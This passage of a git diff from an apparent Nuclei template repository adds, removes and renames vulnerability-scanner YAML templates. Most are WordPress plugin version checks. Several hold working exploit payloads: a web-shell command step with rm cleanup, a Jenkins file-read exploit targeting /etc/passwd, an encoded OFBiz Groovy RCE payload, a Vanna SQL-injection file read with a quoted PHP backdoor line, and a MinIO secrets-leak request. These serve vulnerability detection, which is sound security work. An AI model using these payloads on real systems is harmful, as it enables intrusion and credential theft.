'status_code == 200' + + - raw: + - | + GET /admin/{{websh-file}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + C: {{base64('§echo-cmd§')}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "{{echo-cmd-hash}}" + + - raw: + - | + GET /admin/{{websh-file}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + C: {{base64('rm §lang_file_location§')}} + + matchers: + - type: status + status: + - 200 + + - raw: + - | + GET /admin/{{websh-file}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + C: {{base64('rm §websh-file§')}} + + matchers: + - type: status + status: + - 200 +# digest: 4b0a00483046022100b1477a1e39d3f98efffd283596a2a924a6381e8a6c7a640e99afc1128b907abd022100dac9d4a63ce04aed8df7a74d631dd9774ff4a6e4ee75579fced5cd3c0681d631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/cve-2023-28432.yaml b/nuclei-templates/CVE-2023/cve-2023-28432.yaml deleted file mode 100644 index 31e39b313d..0000000000 --- a/nuclei-templates/CVE-2023/cve-2023-28432.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2023-28432 - -info: - name: MinIO Cluster Deployment - Information Disclosure - author: Mr-xn - severity: high - description: | - MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted. - remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. - reference: - - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q - - https://github.com/minio/minio/pull/16853/files - - https://github.com/golang/vulndb/issues/1667 - - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json - - https://nvd.nist.gov/vuln/detail/CVE-2023-28432 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2023-28432 - cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.1561 - epss-percentile: 0.95366 - cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: minio - product: minio - shodan-query: title:"Minio Console" - fofa-query: app="Minio" - tags: cve,cve2023,minio,console,exposure,kev - -http: - - raw: - - |+ - POST /minio/bootstrap/v1/verify HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"MINIO_ROOT_PASSWORD":' - - '"MINIO_ROOT_USER":' - - '"MinioEnv":' - condition: or - - - type: word - part: header - words: - - 'text/plain' - - - type: status - status: - - 200 -# digest: 4a0a00473045022000cb3be4dccb67a32f0d8e5b6ff545dd3f7dfceb822e7cfb56b4b3002db7feac022100be5b794bf3c32f18b6523b6df576787ddd187fc4b41fad051193c2295cdbf114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/gradio-CVE-2024-1561.yaml b/nuclei-templates/CVE-2024/CVE-2024-1561.yaml similarity index 100% rename from nuclei-templates/Other/gradio-CVE-2024-1561.yaml rename to nuclei-templates/CVE-2024/CVE-2024-1561.yaml diff --git a/nuclei-templates/CVE-2024/CVE-2024-23897.yaml b/nuclei-templates/CVE-2024/CVE-2024-23897.yaml new file mode 100644 index 0000000000..62a1aba442 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-23897.yaml @@ -0,0 +1,56 @@ +id: CVE-2024-23897 + +info: + name: Jenkins < 2.441 - Arbitrary File Read + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. + reference: + - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314 + - https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/ + - https://github.com/Mr-xn/Penetration_Testing_POC + - https://github.com/forsaken0127/CVE-2024-23897 + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-23897 + epss-score: 0.41536 + epss-percentile: 0.97188 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + metadata: + verified: true + max-request: 1 + vendor: jenkins + product: jenkins + shodan-query: "product:\"Jenkins\"" + tags: cve,cve2024,lfi,rce,jenkins +variables: + payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}" + +javascript: + - code: | + let m = require('nuclei/net'); + let name=(Host.includes(':') ? Host : Host+":80"); + let conn,conn2; + try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)} + conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n'); + try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)} + conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body) + resp = conn.RecvString(1000) + args: + Body: "{{payload}}" + Host: "{{Hostname}}" + + matchers: + - type: dsl + dsl: + - 'contains(response, "No such agent \"")' + + extractors: + - type: regex + group: 1 + regex: + - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2024/CVE-2024-38856.yaml b/nuclei-templates/CVE-2024/CVE-2024-38856.yaml deleted file mode 100644 index 9941027675..0000000000 --- a/nuclei-templates/CVE-2024/CVE-2024-38856.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2024-38856 - -info: - name: Apache OFBiz - Remote Code Execution - author: Co5mos - severity: critical - description: | - Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints). - reference: - - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/ - - https://issues.apache.org/jira/browse/OFBIZ-13128 - - https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w - - https://ofbiz.apache.org/download.html - - https://ofbiz.apache.org/security.html - classification: - epss-score: 0.00045 - epss-percentile: 0.16306 - metadata: - verified: true - max-request: 1 - fofa-query: app="Apache_OFBiz" - tags: cve,cve2024,ofbiz,apache,rce,kev - -http: - - raw: - - | - POST /webtools/control/main/ProgramExport HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' - - - type: word - part: body - words: - - 'java.lang.Exception' - - - type: status - status: - - 200 -# digest: 490a0046304402206f35bcc3e276d91d4e1a05964d5c2544dded6826a8fb086b21e982b01c50548e02201954774503527bdb87c96c2d208ce0bbe1383893272f091ffcef7b5f14e74a5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-5827.yaml b/nuclei-templates/CVE-2024/CVE-2024-5827.yaml new file mode 100644 index 0000000000..1138e194e3 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-5827.yaml @@ -0,0 +1,64 @@ +id: CVE-2024-5827 + +info: + name: Vanna - SQL injection + author: olfloralo,nukunga,harksu,nechyo,gy741 + severity: critical + description: | + Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors. + reference: + - https://huntr.com/bounties/a3f913d6-c717-4528-b974-26d8d9e839ca + - https://nvd.nist.gov/vuln/detail/CVE-2024-5827 + - https://huntr.com/bounties/e4e64a51-618b-41d0-8f56-1d2146d8825e + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-5827 + cwe-id: CWE-434 + epss-score: 0.00043 + epss-percentile: 0.09524 + metadata: + verified: true + max-request: 2 + fofa-query: body='vanna.ai' + tags: cve,cve2024,vanna,sqli + +flow: http(1) && http(2) + +http: + - raw: + - | + POST /api/v0/train HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"sql":"SELECT pg_read_file('/etc/passwd', 0, 1000);"} + + matchers: + - type: word + words: + - 'id":' + internal: true + + - raw: + - | + GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'application/json' +# digest: 4b0a0048304602210093740affc4c9c3ea0030913d9c4c8802827341e231bdf5ee94a5e7da27ad2d32022100b100c84672ff47b8e2b2a407027df4880147e2a846c9a92947b1e1415e2cd870:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6017.yaml b/nuclei-templates/CVE-2024/CVE-2024-6017.yaml new file mode 100644 index 0000000000..57e4314b01 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6017.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6017 + +info: + name: > + Music Request Manager <= 1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Music Request Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/119f87d0-dcd7-487a-bee5-ebcfbcb0a62a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6017 + metadata: + fofa-query: "wp-content/plugins/music-request-manager/" + google-query: inurl:"/wp-content/plugins/music-request-manager/" + shodan-query: 'vuln:CVE-2024-6017' + tags: cve,wordpress,wp-plugin,music-request-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/music-request-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "music-request-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6018.yaml b/nuclei-templates/CVE-2024/CVE-2024-6018.yaml new file mode 100644 index 0000000000..f4b24ec66c --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6018.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6018 + +info: + name: > + Music Request Manager <= 1.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Music Request Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5badcfc6-aaff-4c8e-8649-98d71d7a47ec?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6018 + metadata: + fofa-query: "wp-content/plugins/music-request-manager/" + google-query: inurl:"/wp-content/plugins/music-request-manager/" + shodan-query: 'vuln:CVE-2024-6018' + tags: cve,wordpress,wp-plugin,music-request-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/music-request-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "music-request-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6019.yaml b/nuclei-templates/CVE-2024/CVE-2024-6019.yaml new file mode 100644 index 0000000000..9a52e9a613 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6019.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6019 + +info: + name: > + Music Request Manager <= 1.3 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The Music Request Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/29ef1755-f1c4-4251-bd4c-2fe97f291994?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-6019 + metadata: + fofa-query: "wp-content/plugins/music-request-manager/" + google-query: inurl:"/wp-content/plugins/music-request-manager/" + shodan-query: 'vuln:CVE-2024-6019' + tags: cve,wordpress,wp-plugin,music-request-manager,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/music-request-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "music-request-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6088.yaml b/nuclei-templates/CVE-2024/CVE-2024-6088.yaml deleted file mode 100644 index 4ff7356f84..0000000000 --- a/nuclei-templates/CVE-2024/CVE-2024-6088.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wordpress-account-registration-enabled - -info: - name: WordPress account registration enabled - author: topscoder - severity: info - tags: wordpress-misc,wordpress,wp-core,core,info - -http: - - method: GET - path: - - "{{BaseURL}}/wp-login.php?action=register" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Register" - part: body - -# Enhanced \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6688.yaml b/nuclei-templates/CVE-2024/CVE-2024-6688.yaml new file mode 100644 index 0000000000..7994de3ee7 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6688.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6688 + +info: + name: > + Oxygen Builder <= 4.8.3 - Missing Authorization to Authenticated (Subscriber+) Stylesheet Update + author: topscoder + severity: low + description: > + The Oxygen Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the oxy_save_css_from_admin AJAX action in all versions up to, and including, 4.8.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update stylesheets. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78c88402-52ca-44ff-8767-1f843fcb66fd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-6688 + metadata: + fofa-query: "wp-content/plugins/oxygenbuilder/" + google-query: inurl:"/wp-content/plugins/oxygenbuilder/" + shodan-query: 'vuln:CVE-2024-6688' + tags: cve,wordpress,wp-plugin,oxygenbuilder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/oxygenbuilder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "oxygenbuilder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.8.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6690.yaml b/nuclei-templates/CVE-2024/CVE-2024-6690.yaml new file mode 100644 index 0000000000..8c90973a76 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6690.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6690 + +info: + name: > + WP Content Copy Protection & No Right Click (PRO) <= 15.0 - Open Redirect + author: topscoder + severity: medium + description: > + The WP Content Copy Protection & No Right Click (PRO) plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 15.0. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fba24935-5bab-4395-b05e-7bb5d5a1694d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6690 + metadata: + fofa-query: "wp-content/plugins/wccp-pro/" + google-query: inurl:"/wp-content/plugins/wccp-pro/" + shodan-query: 'vuln:CVE-2024-6690' + tags: cve,wordpress,wp-plugin,wccp-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wccp-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wccp-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 15.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6693.yaml b/nuclei-templates/CVE-2024/CVE-2024-6693.yaml new file mode 100644 index 0000000000..88f2e91f01 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6693.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6693 + +info: + name: > + WP Content Copy Protection & No Right Click (PRO) <= 15.0 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Content Copy Protection & No Right Click (PRO) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 15.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d2f30e7-75f2-40c2-a421-aec13d436efc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6693 + metadata: + fofa-query: "wp-content/plugins/wccp-pro/" + google-query: inurl:"/wp-content/plugins/wccp-pro/" + shodan-query: 'vuln:CVE-2024-6693' + tags: cve,wordpress,wp-plugin,wccp-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wccp-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wccp-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 15.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6804.yaml b/nuclei-templates/CVE-2024/CVE-2024-6804.yaml new file mode 100644 index 0000000000..93a2c069c1 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6804.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6804 + +info: + name: > + Jeg Elementor Kit <= 2.6.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File + author: topscoder + severity: low + description: > + The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5491ff65-9060-4b0b-a31d-7b95ea581310?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6804 + metadata: + fofa-query: "wp-content/plugins/jeg-elementor-kit/" + google-query: inurl:"/wp-content/plugins/jeg-elementor-kit/" + shodan-query: 'vuln:CVE-2024-6804' + tags: cve,wordpress,wp-plugin,jeg-elementor-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jeg-elementor-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jeg-elementor-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7304.yaml b/nuclei-templates/CVE-2024/CVE-2024-7304.yaml new file mode 100644 index 0000000000..9bdb527719 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7304.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7304 + +info: + name: > + Ninja Tables – Easiest Data Table Builder <= 5.0.12 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Ninja Tables – Easiest Data Table Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 5.0.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1eb6896-2de3-4d4d-9b5f-253aaffd193b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-7304 + metadata: + fofa-query: "wp-content/plugins/ninja-tables/" + google-query: inurl:"/wp-content/plugins/ninja-tables/" + shodan-query: 'vuln:CVE-2024-7304' + tags: cve,wordpress,wp-plugin,ninja-tables,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ninja-tables/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ninja-tables" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0.12') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7687.yaml b/nuclei-templates/CVE-2024/CVE-2024-7687.yaml new file mode 100644 index 0000000000..55bd99bc9a --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7687.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7687 + +info: + name: > + AZIndex <= 0.8.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The AZIndex plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6b96d79b-cd9c-4925-9c15-d0aaf3c0556a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7687 + metadata: + fofa-query: "wp-content/plugins/azindex/" + google-query: inurl:"/wp-content/plugins/azindex/" + shodan-query: 'vuln:CVE-2024-7687' + tags: cve,wordpress,wp-plugin,azindex,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/azindex/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "azindex" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7688.yaml b/nuclei-templates/CVE-2024/CVE-2024-7688.yaml new file mode 100644 index 0000000000..87ff3c5227 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7688.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7688 + +info: + name: > + AZIndex <= 0.8.1 - Cross-Site Request Forgery to Index Deletion + author: topscoder + severity: medium + description: > + The AZIndex plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to delete indexes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9731e3a-4972-4e1e-b6cd-4bc00a6e9552?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7688 + metadata: + fofa-query: "wp-content/plugins/azindex/" + google-query: inurl:"/wp-content/plugins/azindex/" + shodan-query: 'vuln:CVE-2024-7688' + tags: cve,wordpress,wp-plugin,azindex,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/azindex/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "azindex" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7791.yaml b/nuclei-templates/CVE-2024/CVE-2024-7791.yaml new file mode 100644 index 0000000000..8597291466 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7791.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7791 + +info: + name: > + 140+ Widgets | Xpro Addons For Elementor – FREE <= 1.4.4.3 - 